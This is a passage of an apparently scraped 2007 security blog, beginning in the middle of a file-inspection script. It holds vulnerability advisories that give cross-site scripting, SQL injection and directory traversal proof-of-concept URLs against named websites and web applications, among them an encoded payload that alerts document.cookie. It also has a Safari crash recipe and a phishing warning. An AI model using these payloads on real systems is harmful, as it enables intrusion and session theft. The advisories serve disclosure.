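    created = walk_records(data, issues)
    if h["mtNoObjects"] > created:        # object table larger than objects created
        issues.append("object-count")
    return issues


if __name__ == "__main__":
    for name, blob in (("something.jpg", POC_JPG), ("clean.wmf", CLEAN_WMF)):
        print(name, parse_header(blob), inspect_file(name, blob))
```

On the PoC the header fields that follow mtSize are the ASCII of "reza.ex" read as integers, so the declared object count (25970) and largest record (0x652E617A words) are flagged alongside the extension mismatch, while the three CREATE records and the META_EOF themselves parse cleanly.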
</div>

Lostmon, published 2007-08-07, updated 2007-08-07

Google custom search engine contributors invite XSS
#####################################################
Google custom search engine contributors invite XSS
Vendor url: http://www.google.com
Product Url: http://www.google.com/coop/cse/
Advisory url: http://lostmon.blogspot.com/2007/08/
google-custom-search-engine.html
Vendor notify: yes vendor confirmed: yes Fixed: YES
#####################################################

Description:

A Custom Search Engine is a tailored search experience,
built using Google's core search technology, which
prioritizes or restricts search results based on websites
and pages that you specify, and which can be tailored to
reflect your point of view or area of expertise.

Google Custom Search Engine has a flaw that allows a remote
cross-site scripting attack. This flaw exists because the
application does not validate the textarea when previewing
an invite. This could allow a user to create a specially crafted
invite that would execute arbitrary code in a user's browser
within the trust relationship between the browser and the server,
leading to a loss of integrity.

################
timeline
###############

discovered: 31-07-2007
vendor notify: 31-07-2007
vendor response: 31-07-2007
vendor fix: 07-08-2007 (I tested it today)
disclosure: 07-08-2007

####################
explanation
###################

Screenshot: http://usuarios.lycos.es/reyfuss/xss/images/Google_custom_search_engine.jpg

Go to

http://www.google.com/coop/manage/cse/collaboration?cx=[token-of-search-engine]

and in 'Add a personal note to the invitation' write some javascript
or html code and then click on 'invite preview':
this code is executed...

Also, the form converts hex values with semicolons to html:

it works, transforming them into html code, but it does not execute it :)

We can try converting them to decimal values and it likewise shows the
html without executing it.
It only works with 'simple' html.

######################### €nd ########################

Thanks to estrella for being my light
Thanks to all the Lostmon Team!!

-
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Lostmon, published 2007-08-06, updated 2007-10-25

Orange.es, Starmedia and latinchat vulnerable
#################################################
Orange.es, Starmedia and latinchat vulnerable to
Cross-site Scripting attacks.
Original article: http://lostmon.blogspot.com/
2007/08/orangees-starmedia-y-latinchat.html
#################################################

Several days ago I tried to get in touch with the
webmasters of both starmedia and orange to notify
them of a series of vulnerabilities in their pages.
Up to three emails on different dates without
getting any reply from the group.

These pages are affected by a vulnerability called
cross-site scripting, through which html or javascript
code can be executed in the security context between
the server and the client user.

So if you visit these pages and use their services,
be careful and check the URLs of theirs that you visit,
making sure there is nothing strange in them.


###################################
On the domain: *.orange.es
###################################

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado"><script>
alert()</script>&xargs=&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen"><script>alert()</script>
&filtrofamiliar=Desactivado&xargs="&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=">
<script>alert()</script>&estat=

http://busca.orange.es/search?buscar=crucero&first=
&destino=imagen&filtrofamiliar=Desactivado&xargs=&estat=
"><script>alert()</script>

http://busca.orange.es/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=


http://busca.orange.es/search?buscar=todo+spice+girls
&first=&rbpref=pref&destino=web&filtrofamiliar=Activado
"><script>alert()</script>&xargs=&estat=

All the variables in the following url are affected
except y, x, rbpref and slanguage.


http://busca.orange.es/search?buscar=sss&iall=1&exact=zzz&
iexact=1&any=zzzz&iany=1&none="><script>alert()</script>&
inone=1&date=3&pais=latinamerica&format=&domain=&domain_pers
=&slanguage=&rbpref=advanced&lang=&x=44&y=13

http://cine.orange.es/buscador/contenidos.html?&text=
%22%3E%3Cscript%3Ealert%28document.domain%29%3C/script%3E

http://cine.orange.es/encuestas/encuestas.html?id=3801
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/buscarForos?query=
"><script>alert()</script>


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385&re="><script>alert()</script>

http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=
347&id=1726385"><script>alert()</script>&re=blah


http://foros.orange.es/forosw/servlet/nuevoMensajeForm?foro=415
"><script>alert()</script> // without being logged in.

http://tonosdeespera.orange.es/RingBackTones/servlet/web/
TonosCategoria?identificador=5117154&TitCat=Pop+Rock+
Internacional"><script>alert()</script>

http://personales.orange.es/orange/site/siteBuscador?
palabras="><script>alert()</script>
&idcategoria=#busquedas


###################################
In their chats.
###################################

A private-chat window can be opened without being in the chat,
and in addition the UserName parameter of the user we open the
private chat with is also vulnerable:

http://disp011-org.orange.es/magma_qa/templates/T12/
0/privat.html?
UserName=Lostmon"><script>alert()</script>

http://dhtml.orange.es/magma_qa/templates/T12/R0/
showlogin.html?TEMPLATE=12&CLIENT=JAVA&area=G32&
InstanceID=R32_7-1&UserName=Lostmon

Also, the text boxes for sending text to the channel and
the message box in the private chat allow XSS code to be sent.
Experimenting with the chats, it may likewise be possible to
send XSS code to the other users (I have not tried it).


############################
Starmedia
##########################

As can be seen in the following url, the case is the same
as on the orange.es domain.

The web structure follows the same pattern, so we can assume
it is the same type of system and has the same vulnerabilities
(and so it is).

http://busca.starmedia.com/search?buscar="><script>alert()</script>
&first=&rbpref=all&destino=web&filtrofamiliar=&xargs=&estat=

The chat (latinchat) is affected in the same way, and being the
same type of system it also has the same vulnerabilities.

Screenshot: http://usuarios.lycos.es/reyfuss/xss/images/latinchat.gif

http://login04.latinchat.com/magma_qa/templates/modules/
result/T2.php?UserName=Lostmon"><script>
alert()</script>&InstanceID=R31_1-1

##################### €nd ##############################

Thanks to estrella for being my light
Thanks to all the Lostmon team!

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....

Lostmon, published 2007-08-03, updated 2007-08-03

Crashing Safari 3.0.3 for Windows Step by Step

A few days ago I published in my blog a guide
about how to crash safari 3.0.2 step by step.

<a href="http://lostmon.blogspot.com/2007/07/crashing-safari-302-for-windows-step-by.html" target="_BLANK">http://lostmon.blogspot.com/2007/07/crashing-safari-302-for-windows-step-by.html</a>

Apple expected to fix it in the next version or release, but today I tested
safari for windows 3.0.3 and this flaw
still exists in this version too :((

Another crash can be produced when trying to print any document in safari 3.0.3

--
Sincerely:
Lostmon (lost...@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)


--
Curiosity is what makes the mind move....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
</div>

Lostmon, published 2007-07-25, updated 2007-07-30

ifoto traversal folder enumeration
#################################################
ifoto traversal folder enumeration
Vendor url: http://ifoto.ireans.com/
Advisory: http://lostmon.blogspot.com/2007/07/
ifoto-traversal-folder-enumeration.html
vendor notify: no exploit include: yes
Secunia: <a href="http://secunia.com/advisories/26186/" target="_BLANK">SA26186</a>
BID: <a href="http://www.securityfocus.com/bid/25065" target="_BLANK">25065</a>
SecWatch: <a href="http://secwatch.org/advisories/1018593/" Target="_BLANK">SWID1018593</a>
#################################################


ifoto contains a flaw that allows remote traversal and
arbitrary folder enumeration. This flaw exists because the
application does not validate the 'dir' variable upon submission
to the 'index.php' script. This could allow remote users to
create a specially crafted URL that would use '../'
directory traversal characters to view the folder
structure on the target system with the privileges
of the target web service.



################
versions
################

ifoto 1.0


################
Solution:
################

No solution was available at this time!!!

################
TimeLine
################

Discovered: 18-07-2007
vendor notify: ---
vendor response: ---
disclosure: 25-07-2007


#####################
Examples
#####################


http://[victims]/ifoto/?dir=..%2F..%2F..%2F..%2F..%2F..%2Fetc
http://[victims]/ifoto/?dir=../../../../../../etc
http://[victims]/ifoto/index.php?dir=../../../../../../


################# €nd ############################


--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
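As an added example, not ifoto's code nor part of the advisory: the containment check that index.php needs on the 'dir' value before it lists a folder, tried against the three example values above. The album root and the function name are assumptions.

```python
import posixpath
from typing import Optional
from urllib.parse import unquote

ALBUM_ROOT = "/var/www/ifoto/albums"   # assumed gallery root, not ifoto's real layout


def resolve_album_dir(requested: str, root: str = ALBUM_ROOT) -> Optional[str]:
    """Map the raw ?dir= value to a folder inside root, or None if it escapes.

    The advisory shows both '../' and its '..%2F' form, so the value is
    decoded once (as the web server does for a query string) before the
    path is normalised and compared against the root.
    """
    decoded = unquote(requested)
    if "\x00" in decoded:                 # a NUL would truncate the path at C level
        return None
    candidate = posixpath.normpath(posixpath.join(root, decoded))
    # Only root itself or something strictly below it is acceptable; the
    # trailing separator keeps a sibling such as '/var/www/ifoto/albums2' out.
    if candidate != root and not candidate.startswith(root + "/"):
        return None
    # In a real deployment also resolve symlinks (os.path.realpath) before
    # the comparison, so a link inside root cannot point back outside it.
    return candidate


# The three 'dir' values from the Examples section above.
ADVISORY_EXAMPLES = [
    "..%2F..%2F..%2F..%2F..%2F..%2Fetc",
    "../../../../../../etc",
    "../../../../../../",
]

if __name__ == "__main__":
    for value in ADVISORY_EXAMPLES + ["2007/summer", "/etc", "../albums2", ""]:
        print(repr(value), "->", resolve_album_dir(value))
```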
</div>

Lostmon, published 2007-07-25, updated 2007-07-26

Vikingboard multiple Cross site scripting
#################################################
Vikingboard multiple Cross site scripting
Vendor url: http://vikingboard.com/
Advisory: http://lostmon.blogspot.com/2007/07/
vikingboard-multiple-cross-site.html
vendor notify: yes exploit include: yes
Secunia: <a href="http://secunia.com/advisories/26196/" target="_BLANK">SA26196</a>
BID: <a href="http://www.securityfocus.com/bid/25056" target="_BLANK">25056</a>
SecWatch: <a href="http://secwatch.org/advisories/1018567/" target="_BLANK">SWID1018567</a>
#################################################


Vikingboard is a PHP-based community board designed on
the principle of “less is more”, and features a powerful
web-based extension system, a lightning-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard contains a flaw that allows a remote cross-site
scripting attack. This flaw exists because the application does
not validate multiple params upon submission to multiple scripts.
This could allow a user to create a specially crafted URL that
would execute arbitrary code in a user's browser within the
trust relationship between the browser and the server,
leading to a loss of integrity.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time!!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007


#####################
Examples
#####################


http://localhost/viking/cp.php?mode=9&id=2[XSS-CODE]
http://localhost/viking/cp.php?mode=7&f=1[XSS-CODE]
http://localhost/viking/cp.php?mode=6&quote=1[XSS-CODE]
http://localhost/viking/cp.php?mode=12&act=[XSS-CODE]

http://localhost/viking/user.php?u=2[XSS-CODE]
http://localhost/viking/help.php?act=guidelines[XSS-CODE]


We can call the debug parameter to obtain sensitive information.


http://localhost/viking/post.php?mode=00&f=1[XSS-CODE]&poll=0

When sending a private message the field "Message Title" is affected:

http://localhost/viking/cp.php?mode=6

We can send a PM with a malformed XSS title to other users
and it is executed when the victims go to the Inbox in their control panel:

http://localhost/viking/cp.php?mode=7&f=1

http://localhost/viking/report.php?p=2[XSS-CODE]


http://localhost/viking/topic.php?t=2&s=0[XSS-CODE]

http://localhost/viking/post.php?mode=03&t=2&quote=2[XSS-CODE]
http://localhost/viking/post.php?mode=03&t=2[XSS-CODE]&quote=2
http://localhost/viking/post.php?mode=00&f=1&poll=0[XSS-CODE]

http://localhost/viking/post.php?mode=02&p=2[XSS-CODE]

http://localhost/viking/search.php?search=user:administrator&act=dosearch

If the user has any script code in the first lines of any post,
then when trying to find all posts by this user, the code is
executed when the application shows the results.

##################### €nd ##############################

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
</div>

Lostmon, published 2007-07-25, updated 2007-07-25

Vikingboard debug information disclosure
#################################################
Vikingboard debug information disclosure
Vendor url: http://vikingboard.com/
Advisory: http://lostmon.blogspot.com/2007/07/
vikingboard-debug-information.html
vendor notify: yes exploit include: yes
#################################################


Vikingboard is a PHP-based community board designed on
the principle of “less is more”, and features a powerful
web-based extension system, a lightning-fast cache system
and dynamic web update. Small, but incredibly fast and powerful.



Vikingboard has a weakness which can be exploited by malicious
people to disclose some system information.

The weakness is caused by a design error where debug
information can be disclosed by specifying the "debug" parameter.



################
versions
################

Vikingboard 0.1.2


################
Solution:
################

No solution was available at this time!!!

################
TimeLine
################

Discovered: 20-07-2007
vendor notify: 25-07-2007
vendor response:
disclosure: 25-07-2007


#####################
Examples
#####################


http://localhost/viking/forum.php?f=1&debug=1
http://localhost/viking/cp.php?mode=10&debug=1
http://localhost/viking/cp.php?&debug=1

################# €nd ############################

--
Sincerely:
Lostmon (lostmon@gmail.com)
Web-Blog: http://lostmon.blogspot.com/
Google group: http://groups.google.com/group/lostmon (new)
--
Curiosity is what makes the mind move....
<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
</div>

Lostmon, published 2007-07-22, updated 2007-07-25

AlstraSoft Multiple products multiple Vulnerabilities
####################################################
AlstraSoft Multiple products multiple Vulnerabilities
Vendor url: http://www.alstrasoft.com/products.htm
Advisory url: http://lostmon.blogspot.com/2007/07/
alstrasoft-multiple-products-multiple.html
Vendor notify: yes (webform) Exploit included: yes
BID: <a href="http://www.securityfocus.com/bid/25022" target="_BLANK">25022</a>, <a href="http://www.securityfocus.com/bid/25023" target="_BLANK">25023</a>, <a href="http://www.securityfocus.com/bid/25026" target="_BLANK">25026</a>
####################################################



Multiple products of Alstrasoft are vulnerable
to Cross-site scripting and SQL injection style attacks.



################
examples
################

To exploit some of the flaws you need to log in.

#####################################
AlstraSoft Video Share Enterprise
#####################################


http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&msg=Your+feature+request+is+
sent+"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc&page=10"><script>alert()
</script>&viewtype=&category=mr

http://[Victim]/videoshare/view_video.php?viewkey=
9c1d0e3b9ccc3ab651bc"><script>alert()</script>

http://[Victim]/videoshare/signup.php?
next=upload"><script>alert()</script>

http://[Victim]/videoshare/search_result.php?
search_id=ghgdgdfd"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype="><script>
alert(document.cookie)</script>&category=mr

http://[Victim]/videoshare/video.php?
category=tf"><script>alert()</script>&viewtype=

http://[Victim]/videoshare/video.php?
page=5"><script>alert()</script>

http://[Victim]/videoshare/compose.php?
receiver=demo"><script>alert()</script>

http://[Victim]/videoshare/groups.php?
b=ra&catgy=Recently%20Added"><script>alert()</script>


http://[Victim]/videoshare/siteadmin/
channels.php?a=Search&channelid=&channelname=%22
%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&search=Search

http://[Victim]/videoshare/siteadmin/muser.php?
email=sanam11sa@hotmail.com&uname=GLAMOROUS"><script>alert()</script>


path disclosure:

http://[Victim]/videoshare/uprofile.php?
UID=53"><script>alert()</script>

http://[Victim]/videoshare/channel_detail.php?
chid=24"><script>alert()</script>

http://[Victim]/videoshare/uvideos.php?UID=53
"><script>alert()</script>

http://[Victim]/videoshare/view_video.php?
viewkey=d9607ee5a9d336962c53&page=1&viewtype=&category=mr'

http://[Victim]/videoshare/groups_home.php?urlkey=
RSL"><script>alert()</script>

http://[Victim]/videoshare/ufriends.php?UID=253
"><script>alert()</script>

SQL injection:

http://[Victim]/videoshare/gmembers.php?urlkey=gshahzad&gid=9%20or%201=1

http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1
http://[Victim]/videoshare/ugroups.php?UID=253%20or%201=1
http://[Victim]/videoshare/uprofile.php?UID=253%20or%201=1
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=public
http://[Victim]/videoshare/uvideos.php?UID=253%20or%201=1&type=private
http://[Victim]/videoshare/ufavour.php?UID=253 or 1=1
http://[Victim]/videoshare/ufriends.php?UID=253 or 1=1
http://[Victim]/videoshare/uplaylist.php?UID=253 or 1=1
http://[Victim]/videoshare/ugroups.php?UID=253 or 1=1



###########################################
AlstraSoft Text Ads Enterprise
###########################################

http://[Victim]/ads/forgot_uid.php?r=1"><script>alert()</script>

http://[Victim]/ads/search_results.php?query="><script>alert()</script>

http://[Victim]/ads/search_results.php?query=lala&sk=AlexaRating"><script>alert()</script>

http://[Victim]/ads/website_page.php?pageId=1004"><script>alert()</script>


#########################################
AlstraSoft SMS Text Messaging Enterprise
########################################


http://[Victim]/admin/membersearch.php?pagina=17&q=
la&domain=Walltrapas.es%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E

http://[Victim]/admin/edituser.php?userid=
Walltrapas"><script>alert()</script>

http://[Victim]/admin/membersearch.php?
q=%22%3E%3Cscript%3Ealert%28%29%3C%2Fscript%3E&B1=Submit


#################################################
e-friends

http://alstrahost.com/friends/index.php?mode=
people_card&p_id=927"><script>alert()</script>

This is a persistent XSS.


########################################
AlstraSoft Affiliate Network Pro
########################################

http://[Victim]/affiliate/merchants/index.php?
Act=programedit&mode=edit&id=42"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
programedit&mode=edit&id=42&msg=Program%20Edited%20Success
fully"><script>alert()</script>

http://[Victim]/affiliate/merchants/index.php?Act=
uploadProducts&pgmid=41%20or%201=1 // SQL And XSS

http://[Victim]/affiliate/merchants/index.php?Act=
daily&d=9&m=07&y=2007 // all 
variables XSS affected except Act<br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />ProgramReport&programs=All&err=Please%20Enter%20Valid%20Date<br />"><script>alert()</script><br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />LinkReport&sub=View&i=1&txtto=17/07/2007&txtfrom=12/07/2007<br />&programs=All // all variables XSS affceted except Act y sub<br /><br />http://[Victim]/affiliate/merchants/temp.php?rowid=<br />5"><script>alert()</script> // posible SQL too<br /><br />http://[Victim]/affiliate/merchants/index.php?Act=<br />add_money&msg=Please%20Enter%20A%20valid%20amount"><script>alert()</script><br />&modofpay=Authorize.net&bankname=&bankno=&<br />bankemail=&bankaccount=&payableto=&minimumcheck=&affiliateid=<br /><br />####################################<br />AlstraSoft Article Manager Pro<br />####################################<br /><br />http://[Victim]/article/contact_author.php?<br />userid=1%20"><script>alert()</script><br /><br />#######################################<br />AlstraSoft AskMe Pro<br />#######################################<br /><br />http://[Victim]/ask/forum_answer.php?que_id=85%20or%201=1 // SQL<br /><br />http://[Victim]/ask/search.php?cat_id=14-18%20or%201=1 // SQL<br /><br />http://[Victim]/ask/search.php?status=Pending&cat_id="><script>alert()</script><br />http://[Victim]/ask/search.php?status=Pending&cat_id=1%20or%201=1 // SQL<br />http://[Victim]/ask/register.php?typ=expert"><script>alert()</script><br /><br />###################### €nd ########################<br /><br />Thnx to estrella to be my ligth.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-33412748404277402032007-07-13T11:20:00.000-07:002007-07-13T12:41:20.374-07:00Crashing Safari 3.0.2 for windows Step by StepSafari for Windows 3.0.2 Crash Step by step<br /><br />http://www.apple.com/safari/download/<br /><br /><br />The bug comes from the Activity window when managing<br />different tabs across the Activity window.<br />I reported it to the vendor and they are working on<br />debugging this flaw and others (I think).<br /><br />Version affected:<br /><br />Safari for Windows 3.0.2 (512.13.1)<br />I don't know if this issue could be reproduced<br />in other versions.<br /><br />And I don't know if with this issue a local or<br />remote user can execute code.<br /><br />Let's go<br /><br />1 - Open a Safari window.<br />2 - Open a new tab in the same window (now we are in the second tab).<br />3 - Open Window/Activity (we have the two tabs).<br />4 - Click on the first tab in the Activity window (Safari crashes).<br /><br />Other way:<br /><br />1 - Open a Safari window (window 1).<br />2 - Open a new tab in window 1.<br />3 - Open a new Safari window (window 2).<br />4 - Open a new tab in window 2 (now we are in window 2, tab 2).<br />5 - Open Window/Activity (we have the four tabs).<br />6 - Double-click on any tab of window 1 (Safari crashes).<br /><br />I am working on an HTML file to demonstrate that this possible vuln can be exploited<br />by a remote user.
Any suggestion or idea is welcome at Lostmon@gmail.com<br />Thnx to all !!<br /><br />Watch this 'mov' to see the step by step in the video:<br /><br /><object width="400" height="250"><param name="movie" value="http://www.spymac.com/hop?id=2150262"></param><param name="wmode" value="transparent"></param><embed src="http://www.spymac.com/hop?id=2150262" type="application/x-shockwave-flash" wmode="transparent" width="400" height="250"></embed></object><br /><br /><br />Thnx to estrella for being my light.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-59586607572690051652007-07-04T11:12:00.000-07:002007-07-05T11:39:05.557-07:00NetFlow Analyzer 5 & OpManager 7 multiple XSS###################################################<br />NetFlow Analyzer 5 & OpManager 7 multiple XSS<br />Vendor url: http://www.adventnet.com/<br />Advisory: http://lostmon.blogspot.com/2007/07/netflow-analizer-5-opmanager-7-multiple.html<br />Vendor notified: yes  Exploits included: yes<br />Secunia: <a href="http://secunia.com/advisories/25947/" target="_BLANK">SA25947</a>, <a href="http://secunia.com/advisories/20067/" target="_BLANK">SA20067</a><br />BID: <a href="http://www.securityfocus.com/bid/24767" target="_BLANK">24767</a>, <a href="http://www.securityfocus.com/bid/24766" target="_BLANK">24766</a><br />SecWatch: <a href="http://secwatch.org/advisories/1018376/" target="_BLANK">SWID1018376</a>, <a href="http://secwatch.org/advisories/1018377/" target="_BLANK">SWID1018377</a><br />###################################################<br /><br />NetFlow Analyzer and OpManager contain a flaw that allows<br />a remote cross-site scripting attack. This flaw exists<br />because the application does not validate multiple parameters<br />upon submission to multiple scripts. This could allow a user<br />to create a specially crafted URL that would execute<br />arbitrary script code in a user's browser within the trust<br />relationship between the browser and the server,<br />leading to a loss of integrity.<br /><br /><br /><br />#####################<br />Versions affected:<br />#####################<br /><br />OpManager 7<br />OpManager 6<br /><br />NetFlow Analyzer 5<br /><br />Other versions may be vulnerable too.<br /><br />###################<br />Solution:<br />###################<br /><br />No solution was available at this time !!!<br /><br />##################<br />Time Line<br />##################<br /><br />Discovered: 20-05-2007<br />Vendor notified: 02-07-2007<br />Vendor response: -----<br />Disclosure: 04-07-2007<br /><br />###################<br />Examples<br />###################<br /><br />To exploit some of these flaws you need to be logged in.<br /><br />Every URL below injects the same URL-encoded payload, written here once as [PAYLOAD]:<br /><br /><span style="font-size:78%;">%22%3E%3C%62%6F%64%79%3E%3C%68%31%3E%3C%70%3E%3C%61%20%68%72%65%66%3D%22%68%74%74%70%3A%2F%2F%6C%6F%73%74%6D%6F%6E%2E%62%6C%6F%67%73%70%6F%74%2E%63%6F%6D%22%3E%4C%6F%73%74%6D%6F%6E%20%57%61%73%20%48%65%72%65%20%21%21%21%3C%2F%68%31%3E%3C%2F%62%72%3E%58%53%53%20%50%6F%57%40%20%21%21%21%21%3C%2F%70%3E%3C%73%63%72%69%70%74%3E%61%6C%65%72%74%28%64%6F%63%75%6D%65%6E%74%2E%63%6F%6F%6B%69%65%29%3C%2F%73%63%72%69%70%74%3E%3C%2F%62%6F%64%79%3E</span><br /><br />It starts with %22%3E (a quote and a closing bracket) to break out of the quoted attribute the parameter is reflected into, then injects a body with a link to this blog, a heading and a script that alerts document.cookie.<br /><br />#####################<br />OpManager<br />#####################<br /><br />http://localhost:8080/map/ping.do?name=192.168.1.2[PAYLOAD]<br /><br />http://localhost:8080/map/traceRoute.do?name=192.168.1.2[PAYLOAD]<br /><br />http://localhost:8080/devices/Search.do?searchTerm=sss[PAYLOAD]E&requestid=SNAPSHOT&selectedTab=Map<br /><br />http://localhost:8080/reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_Memory_Utilization&reportName=Utilization_Report[PAYLOAD]E&displayName=webclient.reports.servers.memutil<br /><br />http://localhost:8080/reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_Memory_Utilization&reportName=Utilization_Report&displayName=webclient.reports.servers.memutil[PAYLOAD]<br /><br />http://localhost:8080/reports/ReportViewAction.do?selectedTab=Reports&selectedNode=Server_CPU_Utilization[PAYLOAD]&reportName=Utilization_Report&displayName=webclient.reports.servers.cpuutil<br /><br />http://localhost:8080/admin/ServiceConfiguration.do?operation=modifyNTService[PAYLOAD]&services=Alerter&serviceName=Alerter<br /><br />http://localhost:8080/admin/DeviceAssociation.do?selectedNode=[PAYLOAD]NTServiceConfigurations&className=com.adventnet.me.opmanager.webclient.admin.association.NTServiceAssociation<br /><br />http://localhost:8080/admin/DeviceAssociation.do?selectedTab=admin[PAYLOAD]&selectedNode=NTServiceConfigurations<br /><br />http://localhost:8080/admin/DeviceAssociation.do?selectedTab=admin&selectedNode=NTServiceConfigurations[PAYLOAD]<br /><br />#######################<br />NetFlow Analyzer<br />#######################<br /><br />http://localhost:8080/netflow/jspui/applicationList.jsp?alpha=A[PAYLOAD]<br /><br />http://localhost:8080/netflow/jspui/appConfig.jsp?task=Modify[PAYLOAD]&appID=62<br /><br />http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=ipgroups[PAYLOAD]&grDisp=Todos%20los%20grupos<br /><br />http://localhost:8080/netflow/jspui/index.jsp?grID=-1&view=groups[PAYLOAD]&grDisp=1<br /><br />http://localhost:8080/netflow/jspui/selectDevice.jsp?rtype=global[PAYLOAD]<br /><br />http://localhost:8080/netflow/jspui/customReport.jsp?rtype=global[PAYLOAD]&period=hourly&customOption=true&firstTime=true<br /><br />#################### €nd 
################################<br /><br />Thnx to estrella for being my light.<br />Thnx to all Lostmon Team !!!<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br /><br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
La curiosidad es lo que hace mover la mente....</div>Lostmonhttp://www.blogger.com/profile/12070694315455553235noreply@blogger.comtag:blogger.com,1999:blog-9011578.post-85638043310934147332007-06-17T05:48:00.000-07:002007-06-17T07:52:14.851-07:00Skype Phishing and other payment method Scam################################################<br />Skype Phishing and other payment method Scam<br />###############################################<br /><br />Today I received an e-mail asking me to update<br />the information of my Skype account (a system I do not use).<br /><br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/correo.jpg" height="250" width="400"><br />It is a new way of getting hold of the passwords of<br />unwary users; but this goes a little further.<br /><br />If, unfortunately, we visit the malicious website:<br /><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/login.html<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/web_original.jpg" height="250" width="400"><br />besides losing our Skype account we have much<br />more to lose, since the malicious page will also try,<br />by deception, to get hold of several of our<br />passwords or important details of our online<br />payment methods.<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/formas_pago.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/c2.php<br /><br />Our PayPal account:<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/paypal_phishing.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/PayPal%20-%20Log%20In.htm<br /><br /><br />Our Moneybookers account:<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/moneybroker_phishing.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/book1.htm<br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/moneybroker_phishing2.jpg" height="250" width="400"><br />http://www.ac-amiens.fr/inspections/80/peronne/mobile/skype.com/5746464646/bookf.htm<br /><br />as well as possibly the details of our Visa and/or MasterCard card.<br /><br /><IMG src="http://usuarios.lycos.es/reyfuss/skype/skype_phishing.jpg" height="250" width="400"><br />Make sure that the addresses you visit are the genuine ones<br />of the payment sites; if not, do not enter any data in them, and<br />even when they are legitimate, you should still be wary.<br /><br />################## €nd ###################################<br /><br />--<br />atentamente:<br />Lostmon (lostmon@gmail.com)<br />Web-Blog: http://lostmon.blogspot.com/<br />Google group: http://groups.google.com/group/lostmon (new)<br />--<br />La curiosidad es lo que hace mover la mente....<div class="blogger-post-footer">Lostmon (lostmon@gmail.com)
